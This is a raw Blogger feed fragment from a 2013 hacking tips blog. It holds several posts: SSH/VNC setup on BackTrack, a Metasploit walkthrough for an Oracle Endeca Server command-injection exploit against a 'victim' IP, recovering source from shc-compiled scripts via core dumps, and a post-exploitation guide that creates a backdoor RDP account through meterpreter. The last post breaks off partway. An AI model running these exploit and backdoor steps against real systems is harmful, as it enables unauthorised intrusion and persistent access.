</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/5811482611310977082/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5811482611310977082'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5811482611310977082'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/exploit-for-ie-9-on-windows-7-sp1.html' title='Exploit for  IE 9 on Windows 7 SP1 '/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7aicinAapaB0V-ZvAwa2S_ZozJME_Z6Gb_DEb1bOypkkh8ta4O1JyAzrIp4OUbxVZ7agAIPYfE8GDHYlfRAW5yOpGkP3_dE2tYmP8EVvV058gDZRFO1vQjSUOoD6QxrblZTVGk18AubBj/s72-c/s.jpeg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-5747849982282681512</id><published>2013-08-29T17:21:00.001+05:30</published><updated>2013-08-29T18:57:16.352+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="ssh"/><title type='text'>Access backtrack from remote computer using ssh &amp; vnc.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
If&amp;nbsp; you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
How to configure ssh in Backtrack 5 r3?&lt;/h4&gt;
&lt;br /&gt;
(1)First we have to generate ssh key.So type following in terminal.&lt;br /&gt;
&lt;br /&gt;
ssh-keygen&lt;br /&gt;
&lt;br /&gt;
It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa&lt;br /&gt;
&lt;br /&gt;
(2)Now we will move this generated keys in ssh folder.&lt;br /&gt;
&lt;br /&gt;
cd /etc/ssh&lt;br /&gt;
mkdir keys&lt;br /&gt;
&lt;br /&gt;
(3)Now copy generated keys from /root/.ssh/id_rsa &amp;amp; paste into keys folder which we create in second step.&lt;br /&gt;
&lt;br /&gt;
(4)Now type following command in terminal&lt;br /&gt;
&amp;nbsp;dpkg-reconfigure openssh-server&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(5)Now we have to start ssh daemon ; so type following in terminal&lt;br /&gt;
service ssh start&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
(6)Now everything is setup ; you can use your ssh server via remote machine.&lt;br /&gt;
For windows you can also use putty like software.If you are on linux machine than type following command.&lt;br /&gt;
ssh -l &quot;username&quot; 192.168.56.1(i.p.)&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-D8rB1I1mBH-09Bt6tyme7_lNo-QTKK1fKIL7U26bD7RGtxlDXCwPdy2uj2ensnVBhrhFoREsY6FrLjKKXssgYfjBxFRbEkBJoStdvH8hipv2s-GYqd_EuE_QWn26qv13LENpJkNfW-g9/s1600/Screenshot-1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;ssh-solution-backtrack&quot; border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-D8rB1I1mBH-09Bt6tyme7_lNo-QTKK1fKIL7U26bD7RGtxlDXCwPdy2uj2ensnVBhrhFoREsY6FrLjKKXssgYfjBxFRbEkBJoStdvH8hipv2s-GYqd_EuE_QWn26qv13LENpJkNfW-g9/s320/Screenshot-1.jpeg&quot; title=&quot;ssh-solution-backtrack&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1nmx7sotfy3kh5oXEWYVC-wzwXxGFHhubpEQuPK2nbF5aMgJyEKcC0TvBpfh9lBtj_Zx-21HlA0wbfxIts4O4m5HU7UN6Bz0dgpMN5Ir0FRRjuP-wJ3RnMlZvxGeRd6JeUlB-fPIi5cCv/s1600/Screenshot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;ssh-solution-backtrack&quot; border=&quot;0&quot; height=&quot;88&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1nmx7sotfy3kh5oXEWYVC-wzwXxGFHhubpEQuPK2nbF5aMgJyEKcC0TvBpfh9lBtj_Zx-21HlA0wbfxIts4O4m5HU7UN6Bz0dgpMN5Ir0FRRjuP-wJ3RnMlZvxGeRd6JeUlB-fPIi5cCv/s320/Screenshot.jpeg&quot; title=&quot;ssh-solution-backtrack-1&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
If you don`t want to use ssh ; i mean you are not comfortable with command line then you can configure vnc.&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
How to setup VNC in backtrack 5 r3?&lt;/h4&gt;
&lt;br /&gt;
(1)apt-get install tightvncserver&lt;br /&gt;
&lt;i&gt; &lt;/i&gt;&lt;br /&gt;
(2)tightvncserver&lt;br /&gt;
&lt;br /&gt;
(3)You will promoted to password .&lt;br /&gt;
&lt;br /&gt;
(4)Enter view only password&lt;br /&gt;
&lt;br /&gt;
Now for access of vnc server we have two options&lt;br /&gt;
&lt;br /&gt;
(1)If you are on linux os than use Remote Desktop Viewer&lt;br /&gt;
&lt;br /&gt;
apt-get install vinagre &lt;br /&gt;
&lt;br /&gt;
And from Edit&amp;gt;plugins check vnc option&lt;br /&gt;
&lt;br /&gt;
Now click on connect &amp;amp; enter i.p. address. &lt;br /&gt;
&lt;br /&gt;
(2)If you are on windows os than use tighvnc . Download from &lt;a href=&quot;http://www.tightvnc.com/download.php&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
After installing Start | All Programs | TightVNC | TightVNC Viewer&lt;br /&gt;
Add remote host address&amp;nbsp; with port number 192.168.56.1:5901. If you do not enter the port, the Windows version of TightVNC Viewer 
will assume the port to be 5900 and will not be able to connect.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&amp;nbsp;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNKLbm5yJxg_v1Pcj7ZOVOCOHfPmKmBSOpLsz13z-mBHpKEqHZ4905_36AtwQO27nUzlMIxKudnNPHQjrUhOR1Ix6uWJtW5dSOBhLG8eJN9jDFIxO0J3jJxlgKMDDmTsqRk5AwdJNlVEX/s1600/Screenshot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;vnc-backtrack&quot; border=&quot;0&quot; height=&quot;233&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnNKLbm5yJxg_v1Pcj7ZOVOCOHfPmKmBSOpLsz13z-mBHpKEqHZ4905_36AtwQO27nUzlMIxKudnNPHQjrUhOR1Ix6uWJtW5dSOBhLG8eJN9jDFIxO0J3jJxlgKMDDmTsqRk5AwdJNlVEX/s320/Screenshot.jpeg&quot; title=&quot;vnc-backtrack&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now you can see that we can open our backtrack os using vnc from remote pc.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5O-qQS2mcptX5-XFlWjJqhMhBDDFDbYqYqFaJoQPc0plhFrKMGc2ruluz5T6VFlYLJomd5hTJFPmgFRAc2uEWnc_2DgVLujfuOeXwHypbky2aCxWrW_bvo8TbVzdw9wyh55YaCVhxqbwq/s1600/Screenshot-1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;vnc-backtrack&quot; border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5O-qQS2mcptX5-XFlWjJqhMhBDDFDbYqYqFaJoQPc0plhFrKMGc2ruluz5T6VFlYLJomd5hTJFPmgFRAc2uEWnc_2DgVLujfuOeXwHypbky2aCxWrW_bvo8TbVzdw9wyh55YaCVhxqbwq/s400/Screenshot-1.jpeg&quot; title=&quot;vnc-backtrack&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/5747849982282681512/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5747849982282681512'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5747849982282681512'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/access-backtrack-from-remote-computer.html' title='Access backtrack from remote computer using ssh &amp; vnc.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-D8rB1I1mBH-09Bt6tyme7_lNo-QTKK1fKIL7U26bD7RGtxlDXCwPdy2uj2ensnVBhrhFoREsY6FrLjKKXssgYfjBxFRbEkBJoStdvH8hipv2s-GYqd_EuE_QWn26qv13LENpJkNfW-g9/s72-c/Screenshot-1.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-513816579743598518</id><published>2013-08-27T13:21:00.000+05:30</published><updated>2013-08-27T13:23:57.317+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Exploit Oracle Endeca Server with metasploit.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
This module exploits a command injection vulnerability on the Oracle &amp;nbsp;Endeca Server 7.4.0. The vulnerability exists on the createDataStore&amp;nbsp; method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn&#39;t available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).&lt;br /&gt;
&lt;br /&gt;
First run ./msfupdate or git pull to update metasploit.&lt;br /&gt;
&lt;br /&gt;
Now when you open metasploit &amp;amp; found error like this&lt;br /&gt;
[-] &amp;nbsp;&amp;nbsp; &amp;nbsp;/opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .&lt;br /&gt;
&lt;br /&gt;
Open oracle_endeca_exec.rb file in any editor.&lt;br /&gt;
Add this line require &#39;msf/core/exploit/powershell&#39;  after require &#39;msf/core&#39;.
&lt;br /&gt;
So it look like
&lt;br /&gt;
require &#39;msf/core&#39;
&lt;br /&gt;
require &#39;msf/core/exploit/powershell&#39;&lt;br /&gt;
Save it &amp;amp; open metasploit again.&lt;br /&gt;
&lt;br /&gt;
Exploit target:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; Id&amp;nbsp; Name&lt;br /&gt;
&amp;nbsp;&amp;nbsp; --&amp;nbsp; ----&lt;br /&gt;
&amp;nbsp;&amp;nbsp; 0&amp;nbsp;&amp;nbsp; Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits &lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/http/oracle_endeca_exec &lt;br /&gt;
msf exploit(oracle_endeca_exec) &amp;gt; set rhost 192.168.56.101(victim`s i.p.)&lt;br /&gt;
rhost =&amp;gt; 192.168.56.101&lt;br /&gt;
msf exploit(oracle_endeca_exec) &amp;gt; run&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqku8brX-p-flhDrwH3pBLzJ-YrXYqRGZ_UiUPq3KrIJ4fSIqy16x3V1DIrunLvpyZPujAxb_6yCiTn1BtuaysgL61BPFyjlG986-1xMu1_KuWew6PGwIKHfQq_yp5qyllO3OxN8NmEbba/s1600/Screenshot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Exploit-Oracle-Endeca-Server&quot; border=&quot;0&quot; height=&quot;177&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqku8brX-p-flhDrwH3pBLzJ-YrXYqRGZ_UiUPq3KrIJ4fSIqy16x3V1DIrunLvpyZPujAxb_6yCiTn1BtuaysgL61BPFyjlG986-1xMu1_KuWew6PGwIKHfQq_yp5qyllO3OxN8NmEbba/s400/Screenshot.jpeg&quot; title=&quot;Exploit-Oracle-Endeca-Server&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/513816579743598518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/513816579743598518'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/513816579743598518'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/exploit-oracle-endeca-server-with.html' title='Exploit Oracle Endeca Server with metasploit.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqku8brX-p-flhDrwH3pBLzJ-YrXYqRGZ_UiUPq3KrIJ4fSIqy16x3V1DIrunLvpyZPujAxb_6yCiTn1BtuaysgL61BPFyjlG986-1xMu1_KuWew6PGwIKHfQq_yp5qyllO3OxN8NmEbba/s72-c/Screenshot.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-5781802213777066633</id><published>2013-08-25T13:09:00.000+05:30</published><updated>2013-08-25T13:11:21.311+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="TRICK"/><title type='text'>How to get plain text source from shc compiled bash script?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
First we see how to compiled bash script to binary?&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
tar -xvzf shc-3.8.7.tgz&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
cd shc-3.8.7&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
make&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
./shc&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
You can see shc usage message.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Now we have script which we want to convert in binary.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
./shc -f /script_path&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
So now you can see that it will convert plain text bash source into binary which extension is&amp;nbsp; .sh.x.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
How to retrieve plain text from binary?&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
The shc compiled binary decrypts and loads the script into memory when started  right after we started the binary, just segfault it and retrieve our script from the core dump.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Core dumps are often used to&amp;nbsp; debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally 
terminates due to bug, operating system security protection schema, or 
program simply try to write beyond the area of memory it has allocated.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
By default most of linux distributions turn off core file creation.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
So we need to turn on core file creation.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
ulimit -c &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
If output is zero means that core file is not created.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Now we set core file size limit to 70000 byte&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
ulimit -c 70000 &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Now we start binary &amp;amp; segfault it right away.I used IP-Digger binary to get plain text from it.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
./IP-Digger4.sh.x&amp;amp;&amp;nbsp; ( sleep 0.02 &amp;amp;&amp;amp; kill -SIGSEGV $! )&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;sleep 0.02 will give the binary enough time to start up and decrypt the 
original script. The variable $! contains the pid of the last background
 process started, so we can easily kill it with the segmentation fault 
signal SIGSEGV (same as kill -11 $!).&amp;nbsp; &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;code&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
+ segmentation fault (core dumped)&amp;nbsp; ./IP-Digger4.sh.x&lt;br /&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
cat core | strings &amp;gt;plain_text&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;code&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOFHqZj8uM68nJCmJhZQx9y-Rg-k4RVJPyKCi9J2LUB8MrYYADV7tplughyI1D0KAYRGQXJiANy4HuJVW6Mx0DVEg2HOTuZVLmOEZuJOFMmaG0Er_pEWz3TjOypmcZtk3CQfpE8BuLz8_t/s1600/Screenshot-1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;shc-plain-text&quot; border=&quot;0&quot; height=&quot;80&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOFHqZj8uM68nJCmJhZQx9y-Rg-k4RVJPyKCi9J2LUB8MrYYADV7tplughyI1D0KAYRGQXJiANy4HuJVW6Mx0DVEg2HOTuZVLmOEZuJOFMmaG0Er_pEWz3TjOypmcZtk3CQfpE8BuLz8_t/s400/Screenshot-1.jpeg&quot; title=&quot;shc-plain-text&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Now open plain_text file which we created &amp;amp; find plain text source of bash script.I upload source code of ip-digger &lt;a href=&quot;http://pastebin.com/x5UZHeM7&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; .&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
But if your script is too large then adjust core file size.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/5781802213777066633/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5781802213777066633'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5781802213777066633'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/how-to-get-plain-text-source-from-shc.html' title='How to get plain text source from shc compiled bash script?'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOFHqZj8uM68nJCmJhZQx9y-Rg-k4RVJPyKCi9J2LUB8MrYYADV7tplughyI1D0KAYRGQXJiANy4HuJVW6Mx0DVEg2HOTuZVLmOEZuJOFMmaG0Er_pEWz3TjOypmcZtk3CQfpE8BuLz8_t/s72-c/Screenshot-1.jpeg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-5331145277506785871</id><published>2013-08-23T20:55:00.001+05:30</published><updated>2013-08-23T20:58:34.307+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Post exploitation &amp; swaparoo backdoor.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Today we are going to create valid RDP user in victim pc using two method.&lt;br /&gt;
&lt;br /&gt;
(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )&lt;br /&gt;
&lt;br /&gt;
Now we use meterpreter script which create RDP useraccount for logon.&lt;br /&gt;
&lt;b&gt;run getgui -u username -p password.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-5dXQejKZ5Oj3PP_qmWpWsNcJREQ9uZBhx48CpcovB2-Gqh9gAmaOqrZkQe3WmWWCCgD3GNaAfewTr7G7Cb3_72w1B_70aUKB-8am4gmRXgKSGPrqGQsjNXt0C_8ql26PxqMDdS-rZSi/s1600/Screenshot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;msf-post-exploitation&quot; border=&quot;0&quot; height=&quot;221&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-5dXQejKZ5Oj3PP_qmWpWsNcJREQ9uZBhx48CpcovB2-Gqh9gAmaOqrZkQe3WmWWCCgD3GNaAfewTr7G7Cb3_72w1B_70aUKB-8am4gmRXgKSGPrqGQsjNXt0C_8ql26PxqMDdS-rZSi/s320/Screenshot.jpeg&quot; title=&quot;msf-post-exploitation&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;rdesktop victim i.p. &lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMMHxjEzcTkIIg4rcJK1d8Z8dHsTLXVCzdSAaXynoC64_IhnGHEfAUW78ZMqTA8fDUth5UEWXN7i-vHI3cId-6-O7cmagmRbRus4OTLxzI1ApQULMuHfHsixx8uK2ZDS9Cclr8kA_CnYL4/s1600/Screenshot-1.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;msf-post-exploitation-2&quot; border=&quot;0&quot; height=&quot;220&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMMHxjEzcTkIIg4rcJK1d8Z8dHsTLXVCzdSAaXynoC64_IhnGHEfAUW78ZMqTA8fDUth5UEWXN7i-vHI3cId-6-O7cmagmRbRus4OTLxzI1ApQULMuHfHsixx8uK2ZDS9Cclr8kA_CnYL4/s320/Screenshot-1.jpeg&quot; title=&quot;msf-post-exploitation-2&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.&lt;br /&gt;
&lt;br /&gt;
